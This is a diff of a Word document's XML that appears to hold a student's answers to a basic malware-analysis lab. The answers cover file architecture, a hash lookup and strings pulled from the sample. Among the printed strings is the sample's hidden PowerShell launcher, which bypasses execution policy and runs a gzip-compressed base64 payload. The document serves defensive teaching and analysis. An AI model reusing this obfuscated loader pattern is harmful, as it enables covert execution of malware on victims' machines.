--- a/my_answers.docx
+++ b/my_answers.docx
@@ -25,351 +25,8 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>Hello Analyst,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>The help desk has received a few calls from different IT admins regarding the attached program. They say that they've been using this program with no problems until recently. Now, it's crashing randomly and popping up blue windows when it's run. I don't like the sound of that. Do your thing!</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>IR Team</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Objective</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Perform basic static and basic dynamic analysis on this malware sample and extract facts about the malware's </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>behavior</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>. Answer the challenge questions below. If you get stuck, the `answers/` directory has the answers to the challenge.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Tools</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Basic Static:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>- File hashes</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>VirusTotal</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>- FLOSS</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>PEStudio</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>PEView</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Basic Dynamic Analysis</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>- Wireshark</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>Inetsim</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>Netcat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>TCPView</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>Procmon</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
       <w:r>
         <w:t>Challenge Questions:</w:t>
       </w:r>
@@ -384,36 +41,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Basic Static Analysis</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>---</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="PlainText"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -493,147 +120,97 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t xml:space="preserve">x32 architecture from </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>PEview</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>VirusTotal</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Windows 32-bit binary is the architecture of the given sample. This can be viewed in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>PEstudio</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21D5407D" wp14:editId="4604D32D">
+            <wp:extent cx="5865495" cy="3485515"/>
+            <wp:effectExtent l="0" t="0" r="1905" b="635"/>
+            <wp:docPr id="1346938596" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1346938596" name="Picture 1346938596"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId5">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5865495" cy="3485515"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t xml:space="preserve">- Are there any results from submitting the SHA256 hash to </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -723,7 +300,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId5"/>
+                    <a:blip r:embed="rId6"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -769,117 +346,118 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Header</w:t>
+        <w:t>- Describe the results of pulling the strings from this binary. Record and describe any strings that are potentially interesting. Can any interesting information be extracted from the strings?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ans:  </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="0"/>
       </w:pPr>
-      <w:r>
-        <w:t>Target Machine: Intel 386 or later processors and compatible processors</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Powershell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> execution</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="0"/>
       </w:pPr>
-      <w:r>
-        <w:t>Compilation Timestamp: 2021-07-10 09:51:55 UTC</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="0"/>
       </w:pPr>
       <w:r>
-        <w:t>Entry Point: 1187840</w:t>
+        <w:t>kernel32</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Contained Sections: 10</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>- Describe the results of pulling the strings from this binary. Record and describe any strings that are potentially interesting. Can any interesting information be extracted from the strings?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PlainText"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Ans:  </w:t>
-      </w:r>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>CreateThread</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="0"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Powershell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> execution</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>;}$</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>u</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="0"/>
       </w:pPr>
+      <w:r>
+        <w:t>D$$[[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>aYZQ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="0"/>
       </w:pPr>
       <w:r>
-        <w:t>kernel32</w:t>
+        <w:t>powershell.exe -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nop</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -w hidden -noni -ep bypass "&amp;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>(::</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">create((New-Object </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>System.IO.StreamReader</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">(New-Object </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -887,22 +465,30 @@
         <w:spacing w:after="0"/>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>CreateThread</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>System.IO.Compression.GzipStream</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">((New-Object </w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="0"/>
       </w:pPr>
+      <w:r>
+        <w:t>System.IO.MemoryStream</w:t>
+      </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
-        <w:t>;}$</w:t>
+        <w:t>(,[</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t>u</w:t>
+        <w:t>System.Convert]::FromBase64String('H4sIAOW/UWECA51W227jNhB991cMXHUtIRbhdbdAESCLepVsGyDdNVZu82AYCE2NYzUyqZKUL0j87yU</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -910,59 +496,23 @@
         <w:spacing w:after="0"/>
       </w:pPr>
       <w:r>
-        <w:t>D$$[[</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>aYZQ</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>lypLjBNtUL7aGczlz5kL9AGOxQbkoOIRwK1OtkcN8B5/Mz6SQHCW8g0u6RvidymTX6RhNplPB4TfU4S3OWZYi19B57IB5vA2DC/iCm/Dr/G9kGsLJLscvdIVGqInRj0r9Wpn8qfASF7</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="0"/>
       </w:pPr>
       <w:r>
-        <w:t>powershell.exe -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nop</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -w hidden -noni -ep bypass "&amp;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>(::</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">create((New-Object </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>System.IO.StreamReader</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">(New-Object </w:t>
+        <w:t>TIdCQxMScpzZRx4WlZ4EFrLMV2R55pGHlLUut29g3EvE6t8wjl+ZhKuvKr/9NYy5Tfz7xIrFaUJ/1jaawyJvgz4aXY8EzQpJQGzqcUDJUCR8BKJEWGFuCvfgCVSroAvw4DIf4D3XnKk</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="0"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>System.IO.Compression.GzipStream</w:t>
-      </w:r>
